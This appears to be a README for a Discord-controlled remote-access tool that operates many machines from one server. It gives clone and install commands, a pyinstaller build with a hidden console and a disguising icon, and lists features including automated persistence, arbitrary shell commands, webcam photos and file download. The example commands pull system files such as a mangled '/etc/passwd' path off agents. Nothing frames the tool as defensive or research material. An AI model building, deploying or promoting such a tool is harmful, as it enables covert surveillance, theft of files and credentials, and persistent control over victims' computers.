A discord command on control script to control multiple system from 1 discord server.
Install and run with python
git clone https://github.com/Rahim7x/dugme.git
cd dugme
pip install -r requirements.txt
python dugme.py
Create an executable
pip install pyinstaller
pyinstaller dugme.py --onefile --noconsole --icon settings.ico
- Run via python
- Run like any normal executable
- automated peristance
- run any command
- take pictures from webcam
- send any files
- Check online clients
- Execute system commands
!shell.<client_username> ls # For Linux
# Eg :
!shell.agent1 dir
- Download file from system
!getfile.<client_username> /file_path
# Eg :
!getfile.agent1 /etc/passed
- upload a file via sendint trough attachments
!savefile.<client_username> # + Attachment
- Take phot via webcam